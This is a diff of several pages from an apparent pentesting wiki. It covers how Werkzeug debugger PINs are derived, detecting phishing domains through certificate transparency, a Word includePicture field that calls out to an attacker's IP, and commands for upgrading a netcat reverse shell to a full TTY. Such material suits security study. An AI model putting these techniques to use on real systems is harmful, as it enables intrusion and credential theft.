|
* `getattr(mod, '__file__', None)` is the absolute path of `app.py` in the flask directory \(e.g. `/usr/local/lib/python3.5/dist-packages/flask/app.py`\). If `app.py` doesn't work, try `app.pyc`
|
||||||
* `uuid.getnode()` is the MAC address of the current computer, `str (uuid.getnode ())` is the decimal expression of the mac address
|
* `uuid.getnode()` is the MAC address of the current computer, `str (uuid.getnode ())` is the decimal expression of the mac address
|
||||||
* `get_machine_id()` read the value in `/etc/machine-id` or `/proc/sys/kernel/random/boot_id` and return directly if there is, sometimes it might be required to append a piece of information within `/proc/self/cgroup` that you find at the end of the first line \(after the third slash\)
|
* `get_machine_id()` read the value in `/etc/machine-id` or `/proc/sys/kernel/random/boot_id` and return directly if there is, sometimes it might be required to append a piece of information within `/proc/self/cgroup` that you find at the end of the first line \(after the third slash\)
|
||||||
|
|
||||||
|
|
|
@ -34,7 +34,7 @@ For more information read [https://www.bleepingcomputer.com/news/security/hijack
|
||||||
|
|
||||||
### Basic checks
|
### Basic checks
|
||||||
|
|
||||||
Once you have a list of potential suspicions domain names you should **check** them \(mainly the ports HTTP and HTTPS\) to **see if they are using some login form similar** to someone of the victim's domain.
|
Once you have a list of potential suspicions domain names you should **check** them \(mainly the ports HTTP and HTTPS\) to **see if they are using some login form similar** to someone of the victim's domain.
|
||||||
You could also check the port 3333 to see if it's open and running an instance of `gophish`.
|
You could also check the port 3333 to see if it's open and running an instance of `gophish`.
|
||||||
It's also interesting to know **how old each discovered suspicions domain is**, the younger it's the riskier it is.
|
It's also interesting to know **how old each discovered suspicions domain is**, the younger it's the riskier it is.
|
||||||
You can also get **screenshots** of the HTTP and/or HTTPS suspicious web page to see if it's really suspicious and in that case **access it to take a deeper look**.
|
You can also get **screenshots** of the HTTP and/or HTTPS suspicious web page to see if it's really suspicious and in that case **access it to take a deeper look**.
|
||||||
|
@ -51,7 +51,7 @@ The parent page also mentions a domain name variation technique that consist on
|
||||||
|
|
||||||
### Certificate Transparency
|
### Certificate Transparency
|
||||||
|
|
||||||
It's not possible to take the previous "Brute-Force" approach but it's actually **possible to uncover this phishing attempts** also thanks to certificate transparency. Every time a certificate is emitted by a CA, the details are made public. This means that reading the certificate transparency or even monitoring it, it's **possible to find domains that are using a keyword inside it's name** For example, if attackers generates a certificate of https://paypal-financial.com, seeing the certificate it's possible to find the keyword "paypal" and know that that suspicions email is being used.
|
It's not possible to take the previous "Brute-Force" approach but it's actually **possible to uncover this phishing attempts** also thanks to certificate transparency. Every time a certificate is emitted by a CA, the details are made public. This means that reading the certificate transparency or even monitoring it, it's **possible to find domains that are using a keyword inside it's name** For example, if attackers generates a certificate of [https://paypal-financial.com](https://paypal-financial.com), seeing the certificate it's possible to find the keyword "paypal" and know that that suspicions email is being used.
|
||||||
|
|
||||||
The post [https://0xpatrik.com/phishing-domains/](https://0xpatrik.com/phishing-domains/) suggest that you can use Censys to search for certificates affecting a specific keyword and filter by date \(only "new" certificates\) and by the CA issuer "Let's Encrypt":
|
The post [https://0xpatrik.com/phishing-domains/](https://0xpatrik.com/phishing-domains/) suggest that you can use Censys to search for certificates affecting a specific keyword and filter by date \(only "new" certificates\) and by the CA issuer "Let's Encrypt":
|
||||||
|
|
||||||
|
|
|
@ -17,7 +17,7 @@ DOCX files referencing a remote template \(File –Options –Add-ins –Manage:
|
||||||
### Word with external image
|
### Word with external image
|
||||||
|
|
||||||
Go to: _Insert --> Quick Parts --> Field_
|
Go to: _Insert --> Quick Parts --> Field_
|
||||||
_**Categories**: Links and References, **Filed names**: includePicture, and **Filename or URL**: http://<ip>/whatever_
|
_**Categories**: Links and References, **Filed names**: includePicture, and **Filename or URL**:_ [http://<ip>/whatever](http://<ip>/whatever)
|
||||||
|
|
||||||
![](../.gitbook/assets/image%20%28347%29.png)
|
![](../.gitbook/assets/image%20%28347%29.png)
|
||||||
|
|
||||||
|
|
|
@ -2,9 +2,8 @@
|
||||||
|
|
||||||
## Full TTY
|
## Full TTY
|
||||||
|
|
||||||
Note that the shell you set in the `SHELL` variable **must** be **listed inside** _**/etc/shells**_ or `The value for the SHELL variable was not found the /etc/shells file
|
Note that the shell you set in the `SHELL` variable **must** be **listed inside** _**/etc/shells**_ or `The value for the SHELL variable was not found the /etc/shells file
|
||||||
This incident has been reported`.
|
This incident has been reported`. Also note that the next snippets only work in bash. If you're in a zsh, change to a bash before obtaining the shell by running `bash`.
|
||||||
Also note that the next snippets only work in bash. If you're in a zsh, change to a bash before obtaining the shell by running `bash`.
|
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
python3 -c 'import pty; pty.spawn("/bin/bash")'
|
python3 -c 'import pty; pty.spawn("/bin/bash")'
|
||||||
|
@ -13,7 +12,7 @@ python3 -c 'import pty; pty.spawn("/bin/bash")'
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
script -qc /bin/bash /dev/null
|
script -qc /bin/bash /dev/null
|
||||||
(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;
|
(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;
|
||||||
```
|
```
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
|
|